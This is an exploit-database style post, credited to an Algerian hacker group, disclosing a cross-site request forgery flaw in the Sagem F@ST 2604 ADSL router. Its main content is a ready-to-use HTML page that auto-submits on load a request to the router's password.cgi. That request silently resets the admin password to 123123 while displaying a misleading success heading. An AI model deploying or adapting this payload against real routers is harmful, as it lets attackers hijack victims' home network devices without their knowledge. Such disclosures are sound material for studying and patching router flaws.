# Exploit Title: Sagem F@ST 2604 CSRF Vulnerability (ADSL Router) # Author: KinG Of PiraTeS # Facebook Page: www.facebook.com/cr4ck3d # E-mail: t5r@hotmail.com # Category:: webapps # Google Dork: NA # Vendor: http://www.sagem.com/index.php # Version: 253180972B May be Other Version are Affected # Tested on: [Windows 7 Edition Intgrale] #### ## # | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << | # | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 | # | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h | # | * ------> KinG Of PiraTeS * The g0bl!n <-------- * | # | ------------------------------------------------- < | ### # 1)Introduction 2)Vulnerability Description 3)Exploit >> ---------------------------------------------------------------- 1)Introduction The Sagemcom F@st 2604 is a wireless ADSL2/2+ router with one RJ-11 WAN port and four 10/100Base-T LAN ports. 2)Vulnerability Description From SAGEM F@st 2604 U can change the default "Admin" password Or Any User Password which is listening on tcp/ip port 80 May be Other Version are Affected 3)Exploit <html> <body onload="javascript:document.forms[0].submit()"> <H2>Password successfully changed [CSRF Exploit change ADMIN password]</H2> <form method="POST" name="form0" action="http://192.168.1.254/password.cgi?sysPassword=123123"> </form> </body> </html> - 123123 is the New Password - #### Peace From Algeria #### =======**Algerians Hackers**========== # Greets To : Caddy-Dz & KedAns-Dz **All Algerians Hackers** , Kondamne , The-007 , Bensekran , Joker dz (exploit-id.com) , (1337day.com) , (h4ckforu.com) , (alboraaq.com) All My Friends: Ali Abdennadher ,Chaouki Keffois , Kader11000 , Br0x-dz , Hanixpo !-Bb0yH4cK3r_Dz-! , xConsoLe , S@xx0R , kalashinkov3 ,..others ==========================